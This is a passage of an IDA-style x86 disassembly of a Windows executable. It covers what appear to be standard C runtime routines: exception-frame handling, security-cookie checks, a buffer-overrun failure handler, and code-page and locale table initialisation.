		push	[ebp+var_8]
		push	[ebp+arg_0]
		call	sub_413D26

loc_404615:				; DATA XREF: sub_4045EC+12o
		mov	eax, [ebp+arg_4]
		mov	eax, [eax+4]
		and	eax, 0FFFFFFFDh
		mov	ecx, [ebp+arg_4]
		mov	[ecx+4], eax
		mov	edi, large fs:0
		mov	ebx, [ebp+var_4]
		mov	[ebx], edi
		mov	large fs:0, ebx
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn	8
sub_4045EC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40463E	proc near		; CODE XREF: .text:0041C8B9j
					; .text:0041C8D4j ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 8
		push	ebx
		push	esi
		push	edi
		cld
		mov	[ebp+var_4], eax
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	[ebp+var_4]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_40C124
		add	esp, 20h
		mov	[ebp+var_8], eax
		pop	edi
		pop	esi
		pop	ebx
		mov	eax, [ebp+var_8]
		mov	esp, ebp
		pop	ebp
		retn
sub_40463E	endp

; ---------------------------------------------------------------------------

loc_404674:				; DATA XREF: sub_40491E+24o
		push	esi
		cld
		mov	esi, [esp+0Ch]
		mov	ecx, [esi+8]
		xor	ecx, esi
		call	sub_402AD0
		push	0
		push	esi
		push	dword ptr [esi+14h]
		push	dword ptr [esi+0Ch]
		push	0
		push	dword ptr [esp+24h]
		push	dword ptr [esi+10h]
		push	dword ptr [esp+24h]
		call	sub_40C124
		add	esp, 20h
		pop	esi
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4046A4	proc near		; CODE XREF: sub_404779+81p
					; sub_40BCC4+53p

var_38		= dword	ptr -38h
var_34		= dword	ptr -34h
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		sub	esp, 38h
		push	ebx
		cmp	[ebp+arg_0], 123h
		jnz	short loc_4046C6
		mov	eax, offset loc_40474D
		mov	ecx, [ebp+arg_4]
		mov	[ecx], eax
		xor	eax, eax
		inc	eax
		jmp	loc_404776
; ---------------------------------------------------------------------------

loc_4046C6:				; CODE XREF: sub_4046A4+Ej
		and	[ebp+var_28], 0
		mov	[ebp+var_24], offset sub_404779
		mov	eax, dword_423064
		lea	ecx, [ebp+var_28]
		xor	eax, ecx
		mov	[ebp+var_20], eax
		mov	eax, [ebp+arg_10]
		mov	[ebp+var_1C], eax
		mov	eax, [ebp+arg_4]
		mov	[ebp+var_18], eax
		mov	eax, [ebp+arg_14]
		mov	[ebp+var_14], eax
		mov	eax, [ebp+arg_18]
		mov	[ebp+var_10], eax
		and	[ebp+var_C], 0
		and	[ebp+var_8], 0
		and	[ebp+var_4], 0
		mov	[ebp+var_C], esp
		mov	[ebp+var_8], ebp
		mov	eax, large fs:0
		mov	[ebp+var_28], eax
		lea	eax, [ebp+var_28]
		mov	large fs:0, eax
		mov	[ebp+var_38], 1
		mov	eax, [ebp+arg_0]
		mov	[ebp+var_34], eax
		mov	eax, [ebp+arg_8]
		mov	[ebp+var_30], eax
		call	sub_40574D
		mov	eax, [eax+80h]
		mov	[ebp+var_2C], eax
		lea	eax, [ebp+var_34]
		push	eax
		mov	eax, [ebp+arg_0]
		push	dword ptr [eax]
		call	[ebp+var_2C]
		pop	ecx
		pop	ecx
		and	[ebp+var_38], 0

loc_40474D:				; DATA XREF: sub_4046A4+10o
		cmp	[ebp+var_4], 0
		jz	short loc_40476A
		mov	ebx, large fs:0
		mov	eax, [ebx]
		mov	ebx, [ebp+var_28]
		mov	[ebx], eax
		mov	large fs:0, ebx
		jmp	short loc_404773
; ---------------------------------------------------------------------------

loc_40476A:				; CODE XREF: sub_4046A4+ADj
		mov	eax, [ebp+var_28]
		mov	large fs:0, eax

loc_404773:				; CODE XREF: sub_4046A4+C4j
		mov	eax, [ebp+var_38]

loc_404776:				; CODE XREF: sub_4046A4+1Dj
		pop	ebx
		leave
		retn
sub_4046A4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_404779	proc near		; DATA XREF: sub_4046A4+26o

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ebx
		cld
		mov	eax, [ebp+arg_4]
		mov	ecx, [eax+8]
		xor	ecx, [ebp+arg_4]
		call	sub_402AD0
		mov	eax, [ebp+arg_0]
		mov	eax, [eax+4]
		and	eax, 66h
		jz	short loc_4047A9
		mov	eax, [ebp+arg_4]
		mov	dword ptr [eax+24h], 1
		xor	eax, eax
		inc	eax
		jmp	short loc_404813
; ---------------------------------------------------------------------------
		jmp	short loc_404813
; ---------------------------------------------------------------------------

loc_4047A9:				; CODE XREF: sub_404779+1Dj
		push	1
		mov	eax, [ebp+arg_4]
		push	dword ptr [eax+18h]
		mov	eax, [ebp+arg_4]
		push	dword ptr [eax+14h]
		mov	eax, [ebp+arg_4]
		push	dword ptr [eax+0Ch]
		push	0
		push	[ebp+arg_8]
		mov	eax, [ebp+arg_4]
		push	dword ptr [eax+10h]
		push	[ebp+arg_0]
		call	sub_40C124
		add	esp, 20h
		mov	eax, [ebp+arg_4]
		cmp	dword ptr [eax+24h], 0
		jnz	short loc_4047E7
		push	[ebp+arg_0]
		push	[ebp+arg_4]
		call	sub_4045EC

loc_4047E7:				; CODE XREF: sub_404779+61j
		push	0
		push	0
		push	0
		push	0
		push	0
		lea	eax, [ebp+var_4]
		push	eax
		push	123h
		call	sub_4046A4
		add	esp, 1Ch
		mov	eax, [ebp+var_4]
		mov	ebx, [ebp+arg_4]
		mov	esp, [ebx+1Ch]
		mov	ebp, [ebx+20h]
		jmp	eax
; ---------------------------------------------------------------------------
		xor	eax, eax
		inc	eax

loc_404813:				; CODE XREF: sub_404779+2Cj
					; sub_404779+2Ej
		pop	ebx
		leave
		retn
sub_404779	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_404816	proc near		; CODE XREF: sub_40BCC4+81p
					; sub_40BDB6+1C6p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ebx
		push	esi
		push	edi
		mov	edi, [ebp+arg_0]
		mov	eax, [edi+10h]
		mov	esi, [edi+0Ch]
		mov	[ebp+var_4], eax
		mov	ebx, esi
		jmp	short loc_40485A
; ---------------------------------------------------------------------------

loc_40482D:				; CODE XREF: sub_404816+4Bj
		cmp	esi, 0FFFFFFFFh
		jnz	short loc_404837
		call	sub_40C254

loc_404837:				; CODE XREF: sub_404816+1Aj
		mov	ecx, [ebp+var_4]
		dec	esi
		mov	eax, esi
		imul	eax, 14h
		add	eax, ecx
		mov	ecx, [ebp+arg_8]
		cmp	[eax+4], ecx
		jge	short loc_40484F
		cmp	ecx, [eax+8]
		jle	short loc_404854

loc_40484F:				; CODE XREF: sub_404816+32j
		cmp	esi, 0FFFFFFFFh
		jnz	short loc_40485D

loc_404854:				; CODE XREF: sub_404816+37j
		dec	[ebp+arg_4]
		mov	ebx, [ebp+arg_0]

loc_40485A:				; CODE XREF: sub_404816+15j
		mov	[ebp+arg_0], esi

loc_40485D:				; CODE XREF: sub_404816+3Cj
		cmp	[ebp+arg_4], 0
		jge	short loc_40482D
		mov	eax, [ebp+arg_C]
		inc	esi
		mov	[eax], esi
		mov	eax, [ebp+arg_10]
		mov	[eax], ebx
		cmp	ebx, [edi+0Ch]
		ja	short loc_404877
		cmp	esi, ebx
		jbe	short loc_40487C

loc_404877:				; CODE XREF: sub_404816+5Bj
		call	sub_40C254

loc_40487C:				; CODE XREF: sub_404816+5Fj
		mov	eax, esi
		imul	eax, 14h
		add	eax, [ebp+var_4]
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_404816	endp


; =============== S U B	R O U T	I N E =======================================



sub_404889	proc near		; CODE XREF: sub_40B8AC+28p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	eax, [esp+arg_4]
		push	esi
		mov	esi, [esp+4+arg_0]
		mov	[esi], eax
		call	sub_40574D
		mov	eax, [eax+98h]
		mov	[esi+4], eax
		call	sub_40574D
		mov	[eax+98h], esi
		mov	eax, esi
		pop	esi
		retn
sub_404889	endp


; =============== S U B	R O U T	I N E =======================================



sub_4048B1	proc near		; CODE XREF: sub_40B9D2+60p

arg_0		= dword	ptr  4

		call	sub_40574D
		mov	eax, [eax+98h]
		jmp	short loc_4048C9
; ---------------------------------------------------------------------------

loc_4048BE:				; CODE XREF: sub_4048B1+1Aj
		mov	ecx, [eax]
		cmp	ecx, [esp+arg_0]
		jz	short loc_4048CF
		mov	eax, [eax+4]

loc_4048C9:				; CODE XREF: sub_4048B1+Bj
		test	eax, eax
		jnz	short loc_4048BE
		inc	eax
		retn
; ---------------------------------------------------------------------------

loc_4048CF:				; CODE XREF: sub_4048B1+13j
		xor	eax, eax
		retn
sub_4048B1	endp


; =============== S U B	R O U T	I N E =======================================



sub_4048D2	proc near		; CODE XREF: sub_40B9D2+9p

arg_0		= dword	ptr  4

		push	esi
		call	sub_40574D
		mov	esi, [esp+4+arg_0]
		cmp	esi, [eax+98h]
		jnz	short loc_4048F4
		call	sub_40574D
		mov	ecx, [esi+4]
		mov	[eax+98h], ecx
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_4048F4:				; CODE XREF: sub_4048D2+10j
		call	sub_40574D
		mov	eax, [eax+98h]
		jmp	short loc_40490A
; ---------------------------------------------------------------------------

loc_404901:				; CODE XREF: sub_4048D2+3Cj
		mov	ecx, [eax+4]
		cmp	esi, ecx
		jz	short loc_404916
		mov	eax, ecx

loc_40490A:				; CODE XREF: sub_4048D2+2Dj
		cmp	dword ptr [eax+4], 0
		jnz	short loc_404901
		pop	esi
		jmp	sub_40C254
; ---------------------------------------------------------------------------

loc_404916:				; CODE XREF: sub_4048D2+34j
		mov	ecx, [esi+4]
		mov	[eax+4], ecx
		pop	esi
		retn
sub_4048D2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40491E	proc near		; CODE XREF: sub_40B8AC+7Fp

var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		mov	eax, dword_423064
		and	[ebp+var_18], 0
		lea	ecx, [ebp+var_18]
		xor	eax, ecx
		mov	ecx, [ebp+arg_0]
		mov	[ebp+var_10], eax
		mov	eax, [ebp+arg_4]
		mov	[ebp+var_C], eax
		mov	eax, [ebp+arg_C]
		inc	eax
		mov	[ebp+var_14], offset loc_404674
		mov	[ebp+var_8], ecx
		mov	[ebp+var_4], eax
		mov	eax, large fs:0
		mov	[ebp+var_18], eax
		lea	eax, [ebp+var_18]
		mov	large fs:0, eax
		push	[ebp+arg_10]
		push	ecx
		push	[ebp+arg_8]
		call	sub_40C2A0
		mov	ecx, eax
		mov	eax, [ebp+var_18]
		mov	large fs:0, eax
		mov	eax, ecx
		leave
		retn
sub_40491E	endp


; =============== S U B	R O U T	I N E =======================================



sub_40497C	proc near		; CODE XREF: sub_401065+7p
					; sub_40121E+7p ...

arg_0		= byte ptr  4

		push	eax
		push	large dword ptr	fs:0
		lea	eax, [esp+8+arg_0]
		sub	esp, [esp+0Ch]
		push	ebx
		push	esi
		push	edi
		mov	[eax], ebp
		mov	ebp, eax
		mov	eax, dword_423064
		xor	eax, ebp
		push	eax
		push	dword ptr [ebp-4]
		mov	dword ptr [ebp-4], 0FFFFFFFFh
		lea	eax, [ebp-0Ch]
		mov	large fs:0, eax
		retn
sub_40497C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4049AF	proc near		; CODE XREF: sub_401442+7p
					; sub_40B863+7p

arg_0		= byte ptr  4

		push	eax
		push	large dword ptr	fs:0
		lea	eax, [esp+8+arg_0]
		sub	esp, [esp+0Ch]
		push	ebx
		push	esi
		push	edi
		mov	[eax], ebp
		mov	ebp, eax
		mov	eax, dword_423064
		xor	eax, ebp
		push	eax
		mov	[ebp-10h], esp
		push	dword ptr [ebp-4]
		mov	dword ptr [ebp-4], 0FFFFFFFFh
		lea	eax, [ebp-0Ch]
		mov	large fs:0, eax
		retn
sub_4049AF	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4049E5	proc near		; CODE XREF: sub_40177B:loc_401785p
					; sub_4019F3+Ap ...

arg_0		= byte ptr  4

		push	eax
		push	large dword ptr	fs:0
		lea	eax, [esp+8+arg_0]
		sub	esp, [esp+0Ch]
		push	ebx
		push	esi
		push	edi
		mov	[eax], ebp
		mov	ebp, eax
		mov	eax, dword_423064
		xor	eax, ebp
		push	eax
		mov	[ebp-10h], eax
		push	dword ptr [ebp-4]
		mov	dword ptr [ebp-4], 0FFFFFFFFh
		lea	eax, [ebp-0Ch]
		mov	large fs:0, eax
		retn
sub_4049E5	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_404A1B	proc near		; CODE XREF: sub_401065+2Dp
					; sub_40121E+6Bp ...
		mov	ecx, [ebp-0Ch]
		mov	large fs:0, ecx
		pop	ecx
		pop	edi
		pop	edi
		pop	esi
		pop	ebx
		mov	esp, ebp
		pop	ebp
		push	ecx
		retn
sub_404A1B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_404A2F	proc near		; CODE XREF: sub_40177B:loc_4019EBp
					; sub_4019F3:loc_401C15p ...
		mov	ecx, [ebp-10h]
		xor	ecx, ebp
		call	sub_402AD0
		jmp	sub_404A1B
sub_404A2F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_404A3E	proc near		; CODE XREF: sub_402AD0:loc_402ADAj

var_328		= dword	ptr -328h
var_324		= dword	ptr -324h
var_320		= dword	ptr -320h
arg_0		= byte ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 328h
		mov	dword_4271E8, eax
		mov	dword_4271E4, ecx
		mov	dword_4271E0, edx
		mov	dword_4271DC, ebx
		mov	dword_4271D8, esi
		mov	dword_4271D4, edi
		mov	word_427200, ss
		mov	word_4271F4, cs
		mov	word_4271D0, ds
		mov	word_4271CC, es
		mov	word_4271C8, fs
		mov	word_4271C4, gs
		pushf
		pop	dword_4271F8
		mov	eax, [ebp+0]
		mov	dword_4271EC, eax
		mov	eax, [ebp+4]
		mov	dword_4271F0, eax
		lea	eax, [ebp+arg_0]
		mov	dword_4271FC, eax
		mov	eax, [ebp+var_320]
		mov	dword_427138, 10001h
		mov	eax, dword_4271F0
		mov	dword_4270EC, eax
		mov	dword_4270E0, 0C0000409h
		mov	dword_4270E4, 1
		mov	eax, dword_423064
		mov	[ebp+var_328], eax
		mov	eax, dword_423068
		mov	[ebp+var_324], eax
		call	ds:off_41D08C
		mov	dword_427130, eax
		push	1
		call	sub_407F15
		pop	ecx
		push	0
		call	ds:dword_41D19C	; SetUnhandledExceptionFilter
		push	offset off_41D408
		call	ds:off_41D198
		cmp	dword_427130, 0
		jnz	short loc_404B2E
		push	1
		call	sub_407F15
		pop	ecx

loc_404B2E:				; CODE XREF: sub_404A3E+E6j
		push	0C0000409h
		call	ds:dword_41D0C8	; GetCurrentProcess
		push	eax
		call	ds:off_41D0F4
		leave
		retn
sub_404A3E	endp


; =============== S U B	R O U T	I N E =======================================



sub_404B42	proc near		; CODE XREF: sub_404E6E+11Ep
					; sub_404E6E+173p
		sub	eax, 3A4h
		jz	short loc_404B6B
		sub	eax, 4
		jz	short loc_404B65
		sub	eax, 0Dh
		jz	short loc_404B5F
		dec	eax
		jz	short loc_404B59
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_404B59:				; CODE XREF: sub_404B42+12j
		mov	eax, 404h
		retn
; ---------------------------------------------------------------------------

loc_404B5F:				; CODE XREF: sub_404B42+Fj
		mov	eax, 412h
		retn
; ---------------------------------------------------------------------------

loc_404B65:				; CODE XREF: sub_404B42+Aj
		mov	eax, 804h
		retn
; ---------------------------------------------------------------------------

loc_404B6B:				; CODE XREF: sub_404B42+5j
		mov	eax, 411h
		retn
sub_404B42	endp


; =============== S U B	R O U T	I N E =======================================



sub_404B71	proc near		; CODE XREF: sub_404E6E+2Bp
		push	ebx
		push	ebp
		push	esi
		push	edi
		mov	ebp, 101h
		mov	esi, eax
		push	ebp
		xor	edi, edi
		lea	ebx, [esi+1Ch]
		push	edi
		push	ebx
		call	sub_407F20
		mov	[esi+4], edi
		mov	[esi+8], edi
		mov	[esi+0Ch], edi
		xor	eax, eax
		lea	edi, [esi+10h]
		stosd
		stosd
		stosd
		mov	eax, offset dword_423070
		add	esp, 0Ch
		sub	eax, esi

loc_404BA4:				; CODE XREF: sub_404B71+3Aj
		mov	cl, [eax+ebx]
		mov	[ebx], cl
		inc	ebx
		dec	ebp
		jnz	short loc_404BA4
		lea	ecx, [esi+11Dh]
		mov	esi, 100h

loc_404BB8:				; CODE XREF: sub_404B71+4Ej
		mov	dl, [ecx+eax]
		mov	[ecx], dl
		inc	ecx
		dec	esi
		jnz	short loc_404BB8
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		retn
sub_404B71	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=49Ch


sub_404BC6	proc near		; CODE XREF: sub_404E6E+141p

var_51C		= dword	ptr -51Ch
var_518		= byte ptr -518h
var_512		= byte ptr -512h
var_511		= byte ptr -511h
var_504		= word ptr -504h
var_304		= byte ptr -304h
var_204		= byte ptr -204h
var_104		= byte ptr -104h
var_4		= dword	ptr -4

		push	ebp
		lea	ebp, [esp-49Ch]
		sub	esp, 51Ch
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+49Ch+var_4], eax
		push	ebx
		push	edi
		lea	eax, [ebp+49Ch+var_518]
		push	eax
		push	dword ptr [esi+4]
		call	ds:dword_41D1B4	; GetCPInfo
		test	eax, eax
		mov	edi, 100h
		jz	loc_404CEC
		xor	eax, eax

loc_404BFF:				; CODE XREF: sub_404BC6+43j
		mov	[ebp+eax+49Ch+var_104],	al
		inc	eax
		cmp	eax, edi
		jb	short loc_404BFF
		mov	al, [ebp+49Ch+var_512]
		test	al, al
		mov	[ebp+49Ch+var_104], 20h
		jz	short loc_404C44
		lea	ebx, [ebp+49Ch+var_511]

loc_404C1C:				; CODE XREF: sub_404BC6+7Cj
		movzx	ecx, al
		movzx	eax, byte ptr [ebx]
		cmp	ecx, eax
		ja	short loc_404C3C
		sub	eax, ecx
		inc	eax
		push	eax
		lea	edx, [ebp+ecx+49Ch+var_104]
		push	20h
		push	edx
		call	sub_407F20
		add	esp, 0Ch

loc_404C3C:				; CODE XREF: sub_404BC6+5Ej
		inc	ebx
		mov	al, [ebx]
		inc	ebx
		test	al, al
		jnz	short loc_404C1C

loc_404C44:				; CODE XREF: sub_404BC6+51j
		push	0
		push	dword ptr [esi+0Ch]
		lea	eax, [ebp+49Ch+var_504]
		push	dword ptr [esi+4]
		push	eax
		push	edi
		lea	eax, [ebp+49Ch+var_104]
		push	eax
		push	1
		push	0
		call	sub_40C8A4
		xor	ebx, ebx
		push	ebx
		push	dword ptr [esi+4]
		lea	eax, [ebp+49Ch+var_204]
		push	edi
		push	eax
		push	edi
		lea	eax, [ebp+49Ch+var_104]
		push	eax
		push	edi
		push	dword ptr [esi+0Ch]
		push	ebx
		call	sub_40C6A9
		add	esp, 44h
		push	ebx
		push	dword ptr [esi+4]
		lea	eax, [ebp+49Ch+var_304]
		push	edi
		push	eax
		push	edi
		lea	eax, [ebp+49Ch+var_104]
		push	eax
		push	200h
		push	dword ptr [esi+0Ch]
		push	ebx
		call	sub_40C6A9
		add	esp, 24h
		xor	eax, eax

loc_404CAB:				; CODE XREF: sub_404BC6+122j
		movzx	ecx, [ebp+eax*2+49Ch+var_504]
		test	cl, 1
		jz	short loc_404CC3
		or	byte ptr [esi+eax+1Dh],	10h
		mov	cl, [ebp+eax+49Ch+var_204]
		jmp	short loc_404CD4
; ---------------------------------------------------------------------------

loc_404CC3:				; CODE XREF: sub_404BC6+EDj
		test	cl, 2
		jz	short loc_404CDD
		or	byte ptr [esi+eax+1Dh],	20h
		mov	cl, [ebp+eax+49Ch+var_304]

loc_404CD4:				; CODE XREF: sub_404BC6+FBj
		mov	[esi+eax+11Dh],	cl
		jmp	short loc_404CE5
; ---------------------------------------------------------------------------

loc_404CDD:				; CODE XREF: sub_404BC6+100j
		mov	byte ptr [esi+eax+11Dh], 0

loc_404CE5:				; CODE XREF: sub_404BC6+115j
		inc	eax
		cmp	eax, edi
		jb	short loc_404CAB
		jmp	short loc_404D39
; ---------------------------------------------------------------------------

loc_404CEC:				; CODE XREF: sub_404BC6+31j
		lea	eax, [esi+11Dh]
		mov	[ebp+49Ch+var_51C], 0FFFFFF9Fh
		xor	ecx, ecx
		sub	[ebp+49Ch+var_51C], eax

loc_404CFE:				; CODE XREF: sub_404BC6+171j
		mov	edx, [ebp+49Ch+var_51C]
		lea	eax, [esi+ecx+11Dh]
		add	edx, eax
		lea	ebx, [edx+20h]
		cmp	ebx, 19h
		ja	short loc_404D1E
		or	byte ptr [esi+ecx+1Dh],	10h
		mov	dl, cl
		add	dl, 20h
		jmp	short loc_404D2D
; ---------------------------------------------------------------------------

loc_404D1E:				; CODE XREF: sub_404BC6+14Aj
		cmp	edx, 19h
		ja	short loc_404D31
		or	byte ptr [esi+ecx+1Dh],	20h
		mov	dl, cl
		sub	dl, 20h

loc_404D2D:				; CODE XREF: sub_404BC6+156j
		mov	[eax], dl
		jmp	short loc_404D34
; ---------------------------------------------------------------------------

loc_404D31:				; CODE XREF: sub_404BC6+15Bj
		mov	byte ptr [eax],	0

loc_404D34:				; CODE XREF: sub_404BC6+169j
		inc	ecx
		cmp	ecx, edi
		jb	short loc_404CFE

loc_404D39:				; CODE XREF: sub_404BC6+124j
		mov	ecx, [ebp+49Ch+var_4]
		pop	edi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		add	ebp, 49Ch
		leave
		retn
sub_404BC6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_404D50	proc near		; CODE XREF: sub_402ADF+57p
					; sub_405019+1Ap

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

		push	0Ch
		push	offset dword_421740
		call	__SEH_prolog4
		call	sub_40574D
		mov	edi, eax
		mov	eax, dword_423594
		test	[edi+70h], eax
		jz	short loc_404D8A
		cmp	dword ptr [edi+6Ch], 0
		jz	short loc_404D8A
		mov	esi, [edi+68h]

loc_404D76:				; CODE XREF: sub_404D50+96j
		test	esi, esi
		jnz	short loc_404D82
		push	20h
		call	sub_407C0D
		pop	ecx

loc_404D82:				; CODE XREF: sub_404D50+28j
		mov	eax, esi
		call	__SEH_epilog4
		retn
; ---------------------------------------------------------------------------

loc_404D8A:				; CODE XREF: sub_404D50+1Bj
					; sub_404D50+21j
		push	0Dh
		call	sub_405DA7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		mov	esi, [edi+68h]
		mov	[ebp+var_1C], esi
		cmp	esi, dword_423498
		jz	short loc_404DDA
		test	esi, esi
		jz	short loc_404DC2
		push	esi
		call	ds:dword_41D18C	; InterlockedDecrement
		test	eax, eax
		jnz	short loc_404DC2
		cmp	esi, offset dword_423070
		jz	short loc_404DC2
		push	esi
		call	sub_4039C3
		pop	ecx

loc_404DC2:				; CODE XREF: sub_404D50+56j
					; sub_404D50+61j ...
		mov	eax, dword_423498
		mov	[edi+68h], eax
		mov	esi, dword_423498
		mov	[ebp+var_1C], esi
		push	esi
		call	ds:dword_41D1B8	; InterlockedIncrement

loc_404DDA:				; CODE XREF: sub_404D50+52j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_404DEB
		jmp	short loc_404D76
sub_404D50	endp


; =============== S U B	R O U T	I N E =======================================



sub_404DE8	proc near		; DATA XREF: _1fieagrn:00421758o
		mov	esi, [ebp-1Ch]
sub_404DE8	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_404DEB	proc near		; CODE XREF: sub_404D50+91p
		push	0Dh
		call	sub_405CCF
		pop	ecx
		retn
sub_404DEB	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_404DF4	proc near		; CODE XREF: sub_404E6E+19p
					; sub_405019+25p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		xor	ebx, ebx
		push	ebx
		lea	ecx, [ebp+var_10]
		call	sub_402ADF
		cmp	esi, 0FFFFFFFEh
		mov	dword_427404, ebx
		jnz	short loc_404E2F
		mov	dword_427404, 1
		call	ds:off_41D184

loc_404E21:				; CODE XREF: sub_404DF4+50j
					; sub_404DF4+67j
		cmp	[ebp+var_4], bl
		jz	short loc_404E6B
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	short loc_404E6B
; ---------------------------------------------------------------------------

loc_404E2F:				; CODE XREF: sub_404DF4+1Bj
		cmp	esi, 0FFFFFFFDh
		jnz	short loc_404E46
		mov	dword_427404, 1
		call	ds:dword_41D188	; GetACP
		jmp	short loc_404E21
; ---------------------------------------------------------------------------

loc_404E46:				; CODE XREF: sub_404DF4+3Ej
		cmp	esi, 0FFFFFFFCh
		jnz	short loc_404E5D
		mov	eax, [ebp+var_10]
		mov	eax, [eax+4]
		mov	dword_427404, 1
		jmp	short loc_404E21
; ---------------------------------------------------------------------------

loc_404E5D:				; CODE XREF: sub_404DF4+55j
		cmp	[ebp+var_4], bl
		jz	short loc_404E69
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_404E69:				; CODE XREF: sub_404DF4+6Cj
		mov	eax, esi

loc_404E6B:				; CODE XREF: sub_404DF4+30j
					; sub_404DF4+39j
		pop	ebx
		leave
		retn
sub_404DF4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_404E6E	proc near		; CODE XREF: sub_405019+5Ep

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_12		= byte ptr -12h
var_11		= byte ptr -11h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		mov	ebx, [ebp+arg_4]
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		call	sub_404DF4
		mov	edi, eax
		xor	esi, esi
		cmp	edi, esi
		mov	[ebp+arg_0], edi
		jnz	short loc_404EA5

loc_404E97:				; CODE XREF: sub_404E6E+193j
		mov	eax, ebx
		call	sub_404B71

loc_404E9E:				; CODE XREF: sub_404E6E+146j
		xor	eax, eax
		jmp	loc_40500A
; ---------------------------------------------------------------------------

loc_404EA5:				; CODE XREF: sub_404E6E+27j
		mov	[ebp+var_1C], esi
		xor	eax, eax

loc_404EAA:				; CODE XREF: sub_404E6E+4Fj
		cmp	dword_4234A0[eax], edi
		jz	short loc_404F19
		inc	[ebp+var_1C]
		add	eax, 30h
		cmp	eax, 0F0h
		jb	short loc_404EAA
		lea	eax, [ebp+var_18]
		push	eax
		push	edi
		call	ds:dword_41D1B4	; GetCPInfo
		test	eax, eax
		jz	loc_404FFB
		push	101h
		lea	eax, [ebx+1Ch]
		push	esi
		push	eax
		call	sub_407F20
		xor	edx, edx
		inc	edx
		add	esp, 0Ch
		cmp	[ebp+var_18], edx
		mov	[ebx+4], edi
		mov	[ebx+0Ch], esi
		jbe	loc_404FEE
		cmp	[ebp+var_12], 0
		jz	loc_404FCF
		lea	esi, [ebp+var_11]

loc_404F03:				; CODE XREF: sub_404E6E+15Bj
		mov	cl, [esi]
		test	cl, cl
		jz	loc_404FCF
		movzx	eax, byte ptr [esi-1]
		movzx	ecx, cl
		jmp	loc_404FBF
; ---------------------------------------------------------------------------

loc_404F19:				; CODE XREF: sub_404E6E+42j
		push	101h
		lea	eax, [ebx+1Ch]
		push	esi
		push	eax
		call	sub_407F20
		mov	ecx, [ebp+var_1C]
		add	esp, 0Ch
		imul	ecx, 30h
		mov	[ebp+var_20], esi
		lea	esi, dword_4234B0[ecx]
		mov	[ebp+var_1C], esi
		jmp	short loc_404F69
; ---------------------------------------------------------------------------

loc_404F3F:				; CODE XREF: sub_404E6E+FEj
		mov	al, [esi+1]
		test	al, al
		jz	short loc_404F6E
